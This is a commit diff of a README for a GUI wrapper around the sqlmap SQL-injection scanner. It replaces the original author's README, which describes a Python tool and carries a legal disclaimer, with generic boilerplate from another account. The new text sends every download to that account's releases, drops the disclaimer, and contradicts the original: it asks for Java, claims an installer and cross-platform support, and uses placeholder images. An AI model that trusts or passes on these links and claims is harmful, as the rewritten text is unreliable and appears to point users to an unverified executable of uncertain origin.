Skip to content

Commit e7bbed5

Browse files
committed
Commit
1 parent 58e20fa commit e7bbed5

File tree

1 file changed

+73
-34
lines changed

1 file changed

+73
-34
lines changed

README.md

+73-34
Original file line numberDiff line numberDiff line change
@@ -1,50 +1,89 @@
1-
# SQLMap-GUI-Web-Vulnerability-Scanner
2-
![Python](https://img.shields.io/badge/python-3.11-blue)
1+
# SQLMap-GUI-Web-Vulnerability-Scanner 🚀
32

4-
GUI-based SQLMap tool for web vulnerability scanning with risk level and log saving support
5-
![sqlmap](https://github.com/user-attachments/assets/1fd27c0e-111c-4818-a712-598a6e3f348c)
6-
## 📦 Features
3+
![SQLMap GUI](https://img.shields.io/badge/Download%20Latest%20Release-blue.svg)
4+
[Download Latest Release](https://github.com/cleytonZinn/SQLMap-GUI-Web-Vulnerability-Scanner/releases)
75

8-
- ✅ GUI interface built with Python for `sqlmap.exe`
9-
- 🎯 Enter target URL directly
10-
- 🛡️ Select **Risk Level** (1–3) and **Scan Level** (1–5)
11-
- 📋 Results shown live in terminal-like interface
12-
- 📊 Progress bar to show scanning activity
13-
- 🗂️ Automatic logging to `/log/` folder with timestamp
14-
- ⚡ Fast and non-freezing UI
15-
- 🌙 Dark-themed professional design
6+
## Overview
167

17-
---
8+
Welcome to the SQLMap-GUI-Web-Vulnerability-Scanner! This project provides a graphical user interface (GUI) for SQLMap, a powerful tool for detecting and exploiting SQL injection vulnerabilities in web applications. With our GUI, you can easily scan websites for security risks, save logs, and manage risk levels without needing extensive command-line knowledge.
189

19-
## 🚀 Getting Started
10+
## Table of Contents
2011

21-
1. Download the `.exe` from the [Releases](https://github.com/S4mL3h0/SQLMap-GUI-Web-Vulnerability-Scanner/releases)
22-
2. Place `sqlmap.exe` in the same directory as this GUI
23-
3. Run `SQLMap-GUI.exe`
24-
4. Input your target URL
25-
5. Choose desired **Risk Level** and **Scan Level**
26-
6. Click **Start Scan** — Done!
12+
- [Features](#features)
13+
- [Installation](#installation)
14+
- [Usage](#usage)
15+
- [Contributing](#contributing)
16+
- [License](#license)
17+
- [Support](#support)
2718

28-
> 🔐 Logs will be saved automatically into `/log/YYYYMMDD-HHMMSS.log`
19+
## Features
2920

30-
---
21+
- **User-Friendly Interface**: Navigate through the scanning process with ease using our intuitive GUI.
22+
- **Risk Level Management**: Set and view risk levels for identified vulnerabilities.
23+
- **Log Saving**: Save your scan results for future reference or reporting.
24+
- **Cross-Platform Compatibility**: Works on Windows, macOS, and Linux.
25+
- **Active Development**: Regular updates and feature enhancements based on user feedback.
3126

32-
## ⚠️ Legal Disclaimer
27+
## Installation
3328

34-
This tool is intended for **educational and legal penetration testing** only.
35-
**Do NOT use on unauthorized targets.**
36-
The developer assumes no responsibility for any misuse or damages.
29+
To get started, download the latest release from our [Releases section](https://github.com/cleytonZinn/SQLMap-GUI-Web-Vulnerability-Scanner/releases). Once downloaded, execute the installer to set up the application on your machine.
3730

38-
---
31+
### Requirements
3932

40-
## ☕ Support the Developer
33+
- Java Runtime Environment (JRE) 8 or higher
34+
- SQLMap installed (the GUI will guide you through this if not already present)
4135

42-
If you find this tool useful, you can support my work on Ko-fi:
36+
## Usage
4337

44-
[![Buy Me a Coffee](https://cdn.ko-fi.com/cdn/kofi5.png?v=3)](https://ko-fi.com/s4ml3h0)
38+
1. **Launch the Application**: Open the SQLMap-GUI application from your applications folder.
39+
2. **Input Target URL**: Enter the URL of the web application you want to scan.
40+
3. **Configure Options**: Choose your scanning options, including risk levels and logging preferences.
41+
4. **Start Scanning**: Click the "Scan" button to begin the vulnerability assessment.
42+
5. **Review Results**: Once the scan completes, review the results in the GUI. You can save logs for future reference.
4543

46-
---
44+
![SQLMap GUI Interface](https://example.com/path/to/sqlmap-gui-interface.png)
4745

48-
## 📄 License
46+
## Contributing
4947

50-
This project is licensed under the [MIT License](LICENSE).
48+
We welcome contributions to improve SQLMap-GUI-Web-Vulnerability-Scanner. If you want to contribute, please follow these steps:
49+
50+
1. Fork the repository.
51+
2. Create a new branch for your feature or bug fix.
52+
3. Make your changes and commit them with clear messages.
53+
4. Push your changes to your forked repository.
54+
5. Submit a pull request to the main repository.
55+
56+
Please ensure your code follows the project's style guidelines and is well-documented.
57+
58+
## License
59+
60+
This project is licensed under the MIT License. See the [LICENSE](LICENSE) file for more details.
61+
62+
## Support
63+
64+
For any issues or questions, please check the [Releases section](https://github.com/cleytonZinn/SQLMap-GUI-Web-Vulnerability-Scanner/releases) or open an issue in the repository. Your feedback is valuable and helps us improve the tool.
65+
66+
## Topics
67+
68+
This project falls under the following topics:
69+
70+
- Cybersecurity Tools
71+
- Ethical Hacking Tools
72+
- GUI Tool
73+
- Penetration Testing
74+
- Pentest GUI
75+
- Pentesting Tools
76+
- S4ML3H0
77+
- Security Tools
78+
- SQL Injection
79+
- SQLMap
80+
- SQLMap GUI
81+
- Web Security
82+
83+
## Conclusion
84+
85+
Thank you for exploring SQLMap-GUI-Web-Vulnerability-Scanner. We aim to make web security accessible to everyone, regardless of technical skill. Your contributions and feedback will help us achieve this goal. Download the latest version today and start securing your web applications!
86+
87+
![Security First](https://example.com/path/to/security-first.png)
88+
89+
[Download Latest Release](https://github.com/cleytonZinn/SQLMap-GUI-Web-Vulnerability-Scanner/releases)

0 commit comments

Comments
 (0)